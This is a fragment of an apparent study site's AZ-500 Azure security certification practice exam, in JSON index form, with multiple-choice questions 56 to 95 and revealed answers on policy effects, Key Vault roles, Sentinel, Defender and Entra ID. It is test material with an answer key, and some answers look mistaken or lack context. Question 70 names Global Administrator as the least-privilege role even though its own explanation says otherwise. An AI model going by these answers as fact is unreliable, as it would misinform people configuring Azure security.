                            \"then\": {\n    \"effect\": \"\",\n    \"details\": [{\n        \"field\": \"Microsoft.Storage/storageAccounts/networkAcls.ipRules\",\n        \"value\": [{\n            \"action\": \"Allow\",\n            \"value\": \"134.5.0.0/21\"\n        }]\n    }]\n}\n

                            You need to ensure that the policy is applied whenever a new storage account is created or updated. There is no managed identity assigned to the policy initiative. Which effect should you use? Select only one answer.

                            • Append
                            • Audit
                            • DeployIfNotExists
                            • Modify
                            See response

Append is used to add fields to existing properties and does not require a managed identity, which makes it the correct effect here. Modify is used to add, update, or remove properties, but it requires a managed identity for remediation. DeployIfNotExists is used to deploy resources and also requires a managed identity. Audit is only used to check for compliance.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-57","title":"Question 57","text":"

You have an Azure subscription. You need to recommend a solution that uses Microsoft's crawling technology to discover and actively scan assets within an online infrastructure. The solution must also discover new connections over time. What should you include in the recommendation? Select only one answer.

                            • a Microsoft Defender for Cloud custom initiative
                            • Microsoft Defender External Attack Surface Management (EASM)
                            • Microsoft Defender for Servers
                            • the Microsoft cloud security benchmark (MCSB)
                            See response

Defender EASM applies Microsoft's crawling technology to discover assets that are related to your known online infrastructure and actively scans these assets to discover new connections over time. Attack Surface Insights are generated by applying vulnerability and infrastructure data to showcase the key areas of concern for your organization.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-58","title":"Question 58","text":"

                            You have an Azure subscription and the following SQL deployments:

                            • An Azure SQL database named DB1
                            • An Azure SQL Server named sqlserver1
                            • An instance of SQL Server on Azure Virtual Machines named VM1 that has Microsoft SQL Server 2022 installed
                            • An on-premises server named Server1 that has SQL Server 2019 installed

                            Which deployments can be protected by using Microsoft Defender for Cloud? Select only one answer.

                            • DB1 and sqlserver1 only
                            • DB1, sqlserver1, and VM1 only
                            • DB1, sqlserver1, VM1, and Server1
                            • sqlserver1 only
                            • sqlserver1 and VM1 only
                            See response

                            Defender for Cloud includes Microsoft Defender for SQL. Defender for SQL can protect Azure SQL Database, Azure SQL Server, SQL Server on Azure Virtual Machines, and SQL servers installed on on-premises servers.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-59","title":"Question 59","text":"

                            You are designing a solution that must meet FIPS 140-2 Level 3 compliance in Azure. Where should the solution maintain encryption keys? Select only one answer.

                            • a managed HSM
                            • a software-protected Azure key vault
• an Azure SQL Managed Instance database
                            • an HSM-protected Azure key vault
                            See response

A managed HSM is level 3-compliant. An HSM-protected key vault is level 2-compliant. A software-protected key vault is level 1-compliant. SQL is not FIPS 140-2 Level 3 compliant.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-60","title":"Question 60","text":"

                            You have an Azure tenant that contains a user named User1 and an Azure key vault named Vault1. Vault1 is configured to use Azure role-based access control (RBAC). You need to ensure that User1 can perform actions on keys in Vault1 but cannot manage permissions. The solution must follow the principle of least privilege. Which role should you assign to User1? Select only one answer.

                            • Key Vault Crypto Officer
                            • Key Vault Crypto User
                            • Key Vault Reader
                            • Key Vault Secrets Officer
                            • Key Vault Secrets User
                            See response

Correct: Key Vault Crypto Officer. This role can perform all actions on keys in Vault1 but cannot manage role assignments, so it meets the requirements. Incorrect: Key Vault Crypto User. This role can use keys for cryptographic operations but cannot perform all key actions, such as creating or deleting keys. Incorrect: Key Vault Reader. This role only grants read access, not the ability to perform actions. Incorrect: Key Vault Secrets Officer and Key Vault Secrets User. These roles apply to secrets, not keys.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-61","title":"Question 61","text":"

                            You are implementing an Azure Kubernetes Service (AKS) cluster for a production workload. You need to ensure that the cluster meets the following requirements:

                            • Provides the highest networking performance possible
                            • Manages ingress traffic by using Kubernetes tools

                            What should you use? Select only one answer.

                            • CNI networking with Azure load balancers
                            • CNI networking with ingress resources and controllers
                            • Kubenet networking with Azure load balancers
                            • Kubenet networking with ingress resources and controllers
                            See response

CNI networking provides the best performance because it does not require IP forwarding or user-defined routes (UDRs), and ingress controllers can be managed from within Kubernetes. Kubenet networking requires defined routes and IP forwarding, which makes the network slower. Azure load balancers cannot be managed by using Kubernetes tools.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-62","title":"Question 62","text":"

                            You have an Azure subscription that contains a virtual machine named VM1. VM1 is configured with just-in-time (JIT) VM access. You need to request access to VM1. Which PowerShell cmdlet should you run? Select only one answer.

                            • Add-AzNetworkSecurityRuleConfig
                            • Get-AzJitNetworkAccessPolicy
                            • Set-AzJitNetworkAccessPolicy
                            • Start-AzJitNetworkAccessPolicy
                            See response

The Start-AzJitNetworkAccessPolicy PowerShell cmdlet is used to request access to a JIT-enabled virtual machine. Set-AzJitNetworkAccessPolicy is used to enable JIT on a virtual machine. Get-AzJitNetworkAccessPolicy and Add-AzNetworkSecurityRuleConfig are not used to request access.
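A hedged sketch of such a request, following the hashtable pattern from the Az.Security documentation; the subscription ID, resource group, VM, port, and source address are all placeholders.

# Sketch: request JIT access to RDP (3389) on VM1 for three hours
# from a single source address.
$vmRequest = @{
    id    = "/subscriptions/<sub-id>/resourceGroups/RG1/providers/Microsoft.Compute/virtualMachines/VM1"
    ports = @(@{
        number                     = 3389
        endTimeUtc                 = (Get-Date).AddHours(3).ToUniversalTime()
        allowedSourceAddressPrefix = @("203.0.113.10")
    })
}
Start-AzJitNetworkAccessPolicy `
    -ResourceId "/subscriptions/<sub-id>/resourceGroups/RG1/providers/Microsoft.Security/locations/eastus/jitNetworkAccessPolicies/default" `
    -VirtualMachine @($vmRequest)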

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-63","title":"Question 63","text":"

                            You create a role by using the following JSON.

                            {\n  \"Name\": \"Virtual Machine Operator\",\n  \"Id\": \"88888888-8888-8888-8888-888888888888\",\n  \"IsCustom\": true,\n  \"Description\": \"Can monitor and restart virtual machines.\",\n  \"Actions\": [\n    \"Microsoft.Storage/*/read\",\n    \"Microsoft.Network/*/read\",\n    \"Microsoft.Compute/virtualMachines/start/action\",\n    \"Microsoft.Compute/virtualMachines/restart/action\",\n    \"Microsoft.Authorization/*/read\",\n    \"Microsoft.ResourceHealth/availabilityStatuses/read\",\n    \"Microsoft.Resources/subscriptions/resourceGroups/read\",\n    \"Microsoft.Insights/alertRules/*\",\n    \"Microsoft.Insights/diagnosticSettings/*\",\n    \"Microsoft.Support/*\"\n  ],\n  \"NotActions\": [],\n  \"DataActions\": [],\n  \"NotDataActions\": [],\n  \"AssignableScopes\": [\"/subscriptions/*\"]\n}\n

                            A user that is part of the new role reports that they are unable to restart a virtual machine by using a PowerShell script. What should you do to ensure that the user can restart the virtual machine?

• Add Microsoft.Compute/virtualMachines/login/action to the list of DataActions in the custom role.
• Add Microsoft.Compute/*/read to the list of Actions in the role.
                            See response

The role needs read access to virtual machines to restart them, so you should add Microsoft.Compute/*/read to the list of Actions. The user does not need to authenticate again for the role change to take effect, and the user will still not be able to access the virtual machine from the portal. Adding Microsoft.Compute/virtualMachines/login/action to the list of DataActions in the role allows the user to sign in to the virtual machine, but not to restart it.
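A minimal sketch of applying that fix with Az PowerShell, assuming the role name from the JSON above:

# Sketch: fetch the custom role, add the missing read action, and save it.
$role = Get-AzRoleDefinition "Virtual Machine Operator"
$role.Actions.Add("Microsoft.Compute/*/read")
Set-AzRoleDefinition -Role $role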

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-64","title":"Question 64","text":"

                            You have a Linux virtual machine in an on-premises datacenter that is used as a forwarder for Microsoft Sentinel by using CEF-formatted logs. The timestamp on events retrieved from the forwarder is the time the agent on the forwarder received the event, not the time the event occurred on the system it came from. You need to ensure that Microsoft Sentinel receives the time the event was generated. What should you do? Select only one answer.

• Run cef_gather_info.py on the CEF forwarder.
• Run cef_gather_info.py on each system that sends events to the forwarder.
• Run TimeGenerated.py on each system that sends events to the forwarder.
• Run TimeGenerated.py on the CEF forwarder.
                            See response

Running TimeGenerated.py on the CEF forwarder changes the logging on the forwarder to use the event time instead of the time the event was received by the agent on the forwarder. Running TimeGenerated.py on each system will not change the way events are logged on the forwarder. Running cef_gather_info.py gathers data, but it does not change the timestamp.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-65","title":"Question 65","text":"

                            You configure a Linux virtual machine to send Syslog data to Microsoft Sentinel. You notice that events for the virtual machine are duplicated in Microsoft Sentinel. You need to ensure that the events are not duplicated. Which two actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

                            • Disable the synchronization of the Log Analytics agent with the Syslog configuration in Microsoft Sentinel.
                            • Disable the Syslog daemon from listening to network messages.
                            • Enable the Syslog daemon to listen to network messages.
                            • Remove the entry used to send CEF messages from the Syslog configuration file for the virtual machine.
                            • Stop the Syslog daemon on the virtual machine.
                            See response

You must remove the entry used to send CEF messages from the Syslog configuration on the virtual machine and disable the synchronization of the Log Analytics agent with the Syslog configuration in Microsoft Sentinel so that the setting is not reapplied. Stopping the Syslog daemon on the virtual machine would stop it from sending both Syslog and CEF messages. Enabling or disabling the Syslog daemon's listening for network messages does not address the duplication of events.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-66","title":"Question 66","text":"

                            You are configuring automatic key rotation for an encryption key stored in Azure Key Vault. You need to implement an alert to be triggered five days before the keys are rotated. What should you use? Select only one answer.

                            • an action group alert
                            • Application Insights
                            • Azure Event Grid
                            • Microsoft Defender for Key Vault
                            See response

Using Event Grid, the vault can emit the Microsoft.KeyVault.KeyNearExpiry event before a key version is rotated. Key Vault cannot be monitored by using Application Insights. Defender for Key Vault is used to alert on unusual and unplanned activities. Key Vault key expiration cannot be monitored by using action group alerts.
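A hedged sketch of such a subscription; the vault name and webhook endpoint are hypothetical, and the exact parameter set may vary across Az.EventGrid versions.

# Sketch: subscribe to key near-expiry events on the vault and deliver
# them to a webhook that raises the alert.
$vault = Get-AzKeyVault -VaultName "kv-contoso-demo"
New-AzEventGridSubscription `
    -ResourceId $vault.ResourceId `
    -EventSubscriptionName "key-near-expiry" `
    -Endpoint "https://contoso.example/api/keyalerts" `
    -IncludedEventType "Microsoft.KeyVault.KeyNearExpiry"

The key rotation policy's notification time can then be set so the event fires the desired number of days before expiry.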

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-67","title":"Question 67","text":"

                            You have an Azure subscription that contains an Azure container registry named ACR1 and a user named User1. You need to ensure that User1 can administer images in ACR1. The solution must follow the principle of least privilege. Which two roles should you assign to User1? Each correct answer presents part of the solution. Select all answers that apply.

                            • AcrDelete
                            • AcrImageSigner
                            • AcrPull
                            • AcrPush
                            • Contributor
                            • Reader
                            See response

To administer images in ACR1, a user must be able to push and pull images to ACR1 and delete images from ACR1. The AcrPush and AcrDelete roles together cover pushing, pulling, and deleting images in ACR1. AcrPull only allows pulling images, not pushing or deleting. Contributor can also perform these operations, but it has many additional permissions, so it does not follow the principle of least privilege. Reader and AcrImageSigner do not have adequate permissions.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-68","title":"Question 68","text":"

                            You need to allow only Azure AD-authenticated principals to access an existing Azure SQL database. Which three actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

                            • Add an Azure AD administrator.
                            • Assign your account the SQL Security Manager built-in role.
                            • Connect to the database by using Microsoft SQL Server Management Studio (SSMS).
                            • Connect to the database by using the Azure portal.
• Select Support only Azure Active Directory authentication for this server.
                            See response

Adding an Azure AD administrator and assigning your account the SQL Security Manager built-in role are prerequisites for enabling Azure AD-only authentication. Selecting Support only Azure Active Directory authentication for this server enforces Azure AD authentication on the Azure SQL logical server. A connection to the data plane of the logical server is not needed.
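A hedged Az PowerShell sketch of the server-side steps; the resource names and object ID are placeholders.

# Sketch: set an Azure AD admin on the logical server, then enforce
# Azure AD-only authentication.
Set-AzSqlServerActiveDirectoryAdministrator `
    -ResourceGroupName "RG1" `
    -ServerName "sqlserver1" `
    -DisplayName "SQL Admins" `
    -ObjectId "00000000-0000-0000-0000-000000000000"
Enable-AzSqlServerActiveDirectoryOnlyAuthentication `
    -ResourceGroupName "RG1" `
    -ServerName "sqlserver1"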

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-69","title":"Question 69","text":"

                            You manage Azure AD for a retail company. You need to ensure that employees using shared Android tablets can use passwordless authentication when accessing the Azure portal. Which authentication method should you use? Select only one answer.

                            • the Microsoft Authenticator app
                            • security keys
                            • Windows Hello
                            • Windows Hello for Business
                            See response

                            You can only use the Microsoft Authenticator app or one-time password login on shared devices. Windows Hello can only be used for Windows devices. You cannot use security keys on shared devices.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-70","title":"Question 70","text":"

You need to configure passwordless authentication. The solution must follow the principle of least privilege. Which role should you assign to complete the task? Select only one answer.

                            • Authentication Administrator
                            • Authentication Policy Administrator
                            • Global Administrator
                            • Security Administrator
                            See response

                            Configuring authentication methods requires Global Administrator privileges. Security administrators have permissions to manage other security-related features. Authentication policy administrators can configure the authentication methods policy, tenant-wide multi-factor authentication (MFA) settings, and password protection policy. Authentication administrators can set or reset any authentication methods, including passwords, for non-administrators and some roles.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-71","title":"Question 71","text":"

You manage Azure AD. You disable the Users can register applications option in Azure AD. A user reports that they are unable to register an application. You need to ensure that the user can register applications. The solution must follow the principle of least privilege. What should you do? Select only one answer.

                            • Assign the Application Developer role to the user.
                            • Assign the Authentication Administrator role to the user.
                            • Assign the Cloud App Security Administrator role to the user.
                            • Enable the Users can register applications option.
                            See response

                            The Application Developer role has permissions to register an application even if the Users can register applications option is disabled. The Users can register applications option allows any user to register an application. The Authentication Administrator role and the Cloud App Security Administrator role do not follow the principle of least privilege.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-72","title":"Question 72","text":"

                            You have a virtual network that contains an Azure Kubernetes Service (AKS) workload and an internal load balancer. Multiple virtual networks are managed by multiple teams. You are unable to change any of the IP addresses. You need to ensure that clients from virtual networks in your Azure subscription can access the AKS cluster by using the internal load balancer. What should you do? Select only one answer.

                            • Create a private link endpoint on the virtual network and instruct users to access the cluster by using a private link endpoint on their virtual network.
                            • Create a private link service on the virtual network and instruct users to access the cluster by using a private link endpoint in their virtual networks.
                            • Create virtual network peering between the virtual networks to allow connectivity.
                            • Create VPN site-to-site (S2S) connections between the virtual networks to allow connectivity.
                            See response

                            A private link service will allow access from outside the virtual network to an endpoint by using NAT. Since you do not control the IP addressing for other virtual networks, this ensures connectivity even if IP addresses overlap. Once a private link service is used in the load balancer, other users can create a private endpoint on virtual networks to access the load balancer.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-73","title":"Question 73","text":"

                            You have an Azure subscription that contains a virtual machine named VM1. VM1 runs a web app named App1. You need to protect App1 by implementing Web Application Firewall (WAF). What resource should you deploy? Select only one answer.

                            • Azure Application Gateway
                            • Azure Firewall
                            • Azure Front Door
                            • Azure Traffic Manager
                            See response

                            WAF is a tier of Application Gateway. If you want to deploy WAF, you must deploy Application Gateway and select the WAF or WAF V2 tier.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-74","title":"Question 74","text":"

                            You have an Azure AD tenant that uses the default setting. You need to prevent users from a domain named contoso.com from being invited to the tenant. What should you do? Select only one answer.

                            • Deploy Azure AD Privileged Identity Management (PIM).
                            • Edit the Access review settings.
                            • Edit the Collaboration restrictions settings.
                            • Enable security defaults.
                            See response

                            After you edit the Collaboration restrictions settings, if you try to invite a user from a blocked domain, you cannot. Security defaults and PIM do not affect guest invitation privileges. By default, the Allow invitations to be sent to any domain (most inclusive) setting is enabled. In this case, you can invite B2B users from any organization.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-75","title":"Question 75","text":"

Your company has an Azure Active Directory (Azure AD) tenant named whizlab.com. The company wants to deploy a service named "Getcloudskillsserver" that would run on a virtual machine running Windows Server 2016. The service needs to authenticate to the tenant and access Microsoft Graph to read the directory data. You need to delegate the minimum required permissions for the service. Which of the following steps would you perform in Azure? Choose 3 answers from the options below.

                            • Add an app registration.
                            • Grant Application Permissions.
                            • Add application permission.
                            • Configure an Azure AD Application Proxy.
                            • Add delegated permission.
                            See response

Correct: Add an app registration; Add application permission; Grant Application Permissions. Incorrect: Configure an Azure AD Application Proxy; Add delegated permission. First, you add an application registration. Because the caller is a service rather than a signed-in user, you use application permissions instead of delegated permissions, and finally you grant the required permissions.
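A rough Az PowerShell sketch of the registration step (the display name matches the scenario; granting the Microsoft Graph application permission is then done on the app registration, for example via API permissions plus admin consent):

# Sketch: register the application and create the service principal
# that the service will authenticate as.
$app = New-AzADApplication -DisplayName "Getcloudskillsserver"
New-AzADServicePrincipal -ApplicationId $app.AppId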

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-76","title":"Question 76","text":"

In order to get diagnostics from an Azure virtual machine you own, what is the first step?

                            • A diagnostics agent needs to be installed on the VM
                            • You need to create a storage account to store it
• You need to grant RBAC permissions to the user requesting diagnostics
                            See response

                            You need to create a storage account to store it

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-77","title":"Question 77","text":"

Being the network engineer at your company, you need to ensure that communications with Azure Storage pass through the Service Endpoint. How would you ensure this?

                            • By adding an Inbound rule to allow access to the storage
                            • By adding one Inbound rule and one Outbound rule
                            • By adding an Outbound rule to allow access to the storage
• You don't need to make a specific configuration or add any rule; it is automatically configured.
                            See response

By adding an Outbound rule to allow access to the storage. Inbound and outbound network security group rules can be created to deny traffic to or from the Internet and to allow traffic to or from AzureCloud or other available service tags of particular Azure services.
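A sketch of such an outbound rule built around the Storage service tag; the rule name, priority, and port are assumptions.

# Sketch: allow outbound HTTPS from the virtual network to Azure Storage.
# Attach the rule to an NSG, e.g. via New-AzNetworkSecurityGroup -SecurityRules.
New-AzNetworkSecurityRuleConfig `
    -Name "AllowStorageOutbound" `
    -Direction Outbound `
    -Access Allow `
    -Protocol Tcp `
    -Priority 100 `
    -SourceAddressPrefix "VirtualNetwork" `
    -SourcePortRange "*" `
    -DestinationAddressPrefix "Storage" `
    -DestinationPortRange 443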

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-78","title":"Question 78","text":"

                            You need to recommend a solution for encrypting data at rest and in transit for your company's database. Which of the following would you recommend?

                            • Azure storage encryption
                            • Transparent Data Encryption
                            • Always Encrypted
                            • SSL certificates
                            See response

Always Encrypted. Because data is encrypted on the client side, it remains encrypted both at rest and in transit.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-79","title":"Question 79","text":"

A company wants to synchronize its on-premises Active Directory with its Azure AD tenant. They want to set up a solution that minimizes the need for additional hardware deployment. They also want to ensure that they can keep their current login restrictions, including logon hours for their current Active Directory users. Which authentication method should they implement?

                            • Azure AD Connect and Pass-through authentication
                            • Federated identity using Azure Directory Federation Services
                            • Azure AD Connect and Password hash synchronization
                            • Azure AD Connect and Federated authentication
                            See response

Azure AD Connect and Pass-through authentication. Since we need to minimize additional hardware deployments, we can use Azure AD Connect to synchronize Active Directory users with Azure AD, and pass-through authentication validates passwords against the on-premises Active Directory, so existing login restrictions such as logon hours continue to apply.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-80","title":"Question 80","text":"

You must specify whether the following statement is TRUE or FALSE: You are an administrator at getcloudskills.com and responsible for managing user accounts in Azure Active Directory. In order to leverage Azure administrative units, you need an Azure Active Directory Premium license for each administrative unit member.

                            • True
                            • False
                            See response

False. To manage or use administrative units, you need an Azure Active Directory Premium license only for each administrative unit admin; unit members can use a free license.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-81","title":"Question 81","text":"

                            A development team has published an application onto an Azure Web App service. They want to enable Azure AD authentication for the web application. They have to perform an application registration in Azure AD. Which of the following are required when you configure the App service for Azure AD authentication? Choose two answers from the options given below.

                            • Client ID
                            • Logout URL
                            • Subscription ID
                            • Tenant ID
                            See response

                            Client ID and Tenant ID

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-82","title":"Question 82","text":"

You decide to use Azure Front Door for defining, managing, and monitoring the global routing of your web traffic and optimizing end-user reliability and performance via quick global failover. From the list below, choose the feature that is not supported by Azure Front Door.

                            • Redirect HTTPS traffic to HTTP using URL redirect
                            • Web Application Firewall
                            • URL path-based routing
                            See response

                            Redirect HTTPS traffic to HTTP using URL redirect

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-83","title":"Question 83","text":"

If no rules other than the default NSG rules are in place, are VMs on SubnetA and SubnetB able to connect to the Internet?

                            • Yes
                            • No
                            See response

Yes. The Outbound rules contain a rule named "AllowInternetOutBound". This allows all outbound traffic to the Internet.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-84","title":"Question 84","text":"

Your company has a set of Azure SQL databases hosted on a logical server. They want to enable SQL auditing for the databases. Which of the following can be used to store the audit logs? Choose 3 answers from the options given below.

                            • Azure Log Analytics
                            • Azure SQL database
                            • Azure Event Hubs
                            • Azure Storage accounts
                            • Azure SQL data warehouse
                            See response

                            Azure Log Analytics, Azure Event Hubs and Azure Storage accounts
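A hedged sketch that enables server-level auditing to two of those destinations at once; all names and resource IDs are placeholders.

# Sketch: write audit logs to both a storage account and a
# Log Analytics workspace.
Set-AzSqlServerAudit `
    -ResourceGroupName "RG1" `
    -ServerName "sqlserver1" `
    -BlobStorageTargetState Enabled `
    -StorageAccountResourceId "/subscriptions/<sub-id>/resourceGroups/RG1/providers/Microsoft.Storage/storageAccounts/auditstore1" `
    -LogAnalyticsTargetState Enabled `
    -WorkspaceResourceId "/subscriptions/<sub-id>/resourceGroups/RG1/providers/Microsoft.OperationalInsights/workspaces/laworkspace1"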

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-85","title":"Question 85","text":"

                            Your organization is looking to increase its security posture. Which of the following would you implement to reduce the reliance on passwords and increase account security?

                            • Entra ID B2C
                            • Multi-factor Authentication (MFA)
                            • Passwordless Authentication
                            • Entra ID Directory Roles
                            See response

                            Multi-factor Authentication (MFA) and Passwordless Authentication. Multi-factor Authentication (MFA) enhances security by requiring two or more verification methods. Passwordless authentication allows users to sign in without a password, instead using methods like the Microsoft Authenticator app.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-86","title":"Question 86","text":"

                            Which of the following is designed to ban certain passwords from being used, ensuring users avoid easily guessable and vulnerable passwords?

                            • Entra ID Identity Protection
                            • Entra ID Password Protection
                            • Entra ID MFA
                            • Entra ID B2B
                            See response

                            Entra ID Password Protection. Entra ID Password Protection helps you establish comprehensive defense against weak passwords in your environment. It bans certain passwords and sets lockout settings to prevent malicious attempts.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-87","title":"Question 87","text":"

                            You're setting up an application to use Microsoft Entra ID for authentication. Which of the following are essential components you would need to create or configure in Microsoft Entra ID?

                            • Application Registration
                            • OAuth token grant
                            • Azure Policy
                            See response

                            Application Registration and OAuth token grant. When you register an app with Microsoft Entra ID, you're creating an identity configuration for the app that allows it to integrate with the Entra ID identity service. A service principal is an identity created for use with applications, hosted services, and automated tools to access Azure resources.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-88","title":"Question 88","text":"

                            You need to restrict access to your Azure Storage account such that it can only be accessed from a specific subnet within your Azure Virtual Network. Which feature should you utilize?

                            • Private Link services
                            • Virtual Network Service Endpoints
                            • Azure Functions
                            • Azure SQL Managed Instance
                            See response

                            Virtual Network Service Endpoints. Virtual Network Service Endpoints extend your virtual network private address space and the identity of your VNet to the Azure services, over a direct connection. Endpoints allow you to secure your critical Azure service resources to only your virtual networks.
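A hedged sketch combining the endpoint with the storage account's network rules; all names are hypothetical, and the subnet is assumed to already have the Microsoft.Storage service endpoint enabled.

# Sketch: deny access by default, then allow only the chosen subnet.
$subnet = Get-AzVirtualNetwork -Name "VNet1" -ResourceGroupName "RG1" |
    Get-AzVirtualNetworkSubnetConfig -Name "Subnet1"
Update-AzStorageAccountNetworkRuleSet `
    -ResourceGroupName "RG1" `
    -Name "storage1" `
    -DefaultAction Deny
Add-AzStorageAccountNetworkRule `
    -ResourceGroupName "RG1" `
    -Name "storage1" `
    -VirtualNetworkResourceId $subnet.Id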

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-89","title":"Question 89","text":"

                            Which of the following Azure services offer built-in Distributed Denial of Service (DDoS) protection to secure your applications?

                            • Azure Firewall
                            • Azure Application Gateway
                            • Azure DDoS Protection Standard
                            • Azure Front Door
                            See response

Azure Application Gateway, Azure DDoS Protection Standard, and Azure Front Door. Azure Application Gateway offers DDoS protection as part of its Web Application Firewall (WAF) feature. Azure DDoS Protection Standard provides advanced DDoS mitigation capabilities. Azure Front Door provides both DDoS protection and a Web Application Firewall for its global HTTP/HTTPS endpoints.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-90","title":"Question 90","text":"

                            You have been assigned to enhance the security and compliance of your organization's Azure SQL Database. Which of the following measures can you adopt to encrypt data and audit database operations?

• Transparent Data Encryption (TDE)
                            • Azure SQL Database Always Encrypted
                            • Azure Blob Soft Delete
                            • Enable database auditing
                            See response

Transparent Data Encryption (TDE) and Enable database auditing. Transparent Data Encryption (TDE) encrypts SQL Server, Azure SQL Database, and Azure Synapse Analytics data files. Database auditing tracks database events and writes them to an audit log in your Azure storage account.
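As a sketch, both measures can be enabled per database with Az PowerShell; the resource names and storage account ID are placeholders.

# Sketch: turn on TDE for the database and enable database-level
# auditing to a storage account.
Set-AzSqlDatabaseTransparentDataEncryption `
    -ResourceGroupName "RG1" `
    -ServerName "sqlserver1" `
    -DatabaseName "DB1" `
    -State Enabled
Set-AzSqlDatabaseAudit `
    -ResourceGroupName "RG1" `
    -ServerName "sqlserver1" `
    -DatabaseName "DB1" `
    -BlobStorageTargetState Enabled `
    -StorageAccountResourceId "/subscriptions/<sub-id>/resourceGroups/RG1/providers/Microsoft.Storage/storageAccounts/auditstore1"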

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-91","title":"Question 91","text":"

                            You need to centralize the management of security configurations for multiple Azure subscriptions. Which Azure service should you utilize to ensure consistent application of configurations?

                            • Entra ID
                            • Azure Key Vault
                            • Azure Blueprint
                            • Azure Landing Zone
                            See response

                            Azure Blueprint. Azure Blueprint enables organizations to define a repeatable set of Azure resources that adheres to specific requirements and standards. It allows consistent application of configurations across multiple subscriptions.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-92","title":"Question 92","text":"

                            You are an Azure security specialist who has been tasked with setting up and maintaining the security monitoring within the organization. Which of the following tasks can be accomplished with Microsoft Sentinel?

                            • Monitor security events using Azure Monitor Logs
                            • Automate response to specific security threats
                            • Customize analytics rules to identify potential threats
                            • Deploy virtual machines in Azure
                            • Evaluate and manage generated alerts
                            See response

Monitor security events using Azure Monitor Logs, automate response to specific security threats, customize analytics rules to identify potential threats, and evaluate and manage generated alerts. Microsoft Sentinel uses Azure Monitor Logs for security events, enabling users to monitor those events. It offers automation features to respond to detected security threats, and its analytics rules can be customized to help detect potential threats. Microsoft Sentinel generates alerts based on its analytics, and users can evaluate and manage these alerts within the platform. Deploying virtual machines is a general Azure task and is not a function of Microsoft Sentinel.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-93","title":"Question 93","text":"

                            You have a hybrid configuration of Azure Active Directory (Azure AD). You have an Azure HDInsight cluster on a virtual network. You plan to allow users to authenticate to the cluster by using their on-premises Active Directory credentials. You need to configure the environment to support the planned authentication. Solution: You deploy the On-premises data gateway to the on-premises network. Does this meet the goal?

                            • Yes
                            • No
                            See response

No. Supporting on-premises Active Directory credentials on an HDInsight cluster requires the Enterprise Security Package with Azure AD Domain Services; deploying the on-premises data gateway does not provide this.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-94","title":"Question 94","text":"

Your company has an Azure subscription named Subscription1 that contains the following users:

• User1: Global Administrator
• User2: Billing Administrator
• User3: Owner
• User4: Account Admin

The company is sold to a new owner. The company needs to transfer ownership of Subscription1. Which user can transfer the ownership, and which tool should the user use? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

                            Select user:

                            • User1
                            • User2
                            • User3
                            • User4

                            Select tool:

                            • Azure Account Center
                            • Azure Cloud Shell
                            • Azure PowerShell
                            • Azure Security Center
                            See response

                            User2. Azure Account Center.

                            ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-95","title":"Question 95","text":"

